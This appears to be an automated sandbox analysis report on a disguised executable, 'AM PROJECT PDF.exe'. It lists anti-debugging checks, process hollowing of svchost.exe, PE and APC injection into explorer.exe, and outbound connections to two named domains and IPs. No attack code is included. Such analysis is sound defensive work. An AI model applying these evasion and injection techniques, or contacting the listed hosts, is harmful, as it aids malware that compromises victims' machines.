Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011652A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01238D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01194D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01173D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011EA537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01187D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E3540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01213D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012305AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01192581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01162D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01191DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011935A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01218DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0123740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FC450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_012214FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01238CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FFF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119A70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119E730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0123070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0123070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01164F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01164F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01238F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01178794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0119A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01198E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0121FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01221608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0116E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01177E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0122AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0118AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0117766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01230EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011FFE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011E46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011936CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011A8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_0121FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_01238ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011776E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Code function: 6_2_011916E0 mov ecx, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Code function: 6_2_011A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.fellyhub.com
Source: C:\Windows\explorer.exe	Domain query: www.soraligne.com
Source: C:\Windows\explorer.exe	Network Connect: 162.241.194.111 80
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: 1130000

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Memory written: C:\Users\user\Desktop\AM PROJECT PDF.exe base: 400000 value starts with: 4D5A

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Thread register set: target process: 3452
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3452

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe

Process created: C:\Users\user\Desktop\AM PROJECT PDF.exe C:\Users\user\Desktop\AM PROJECT PDF.exe

Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 0000000D.00000000.336966842.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.319486052.0000000006770000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.369663427.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.303941951.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.397435868.0000000001378000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CProgmanile
Source: explorer.exe, 0000000D.00000000.398188447.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.370523658.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.305301036.0000000001980000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Users\user\Desktop\AM PROJECT PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\AM PROJECT PDF.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
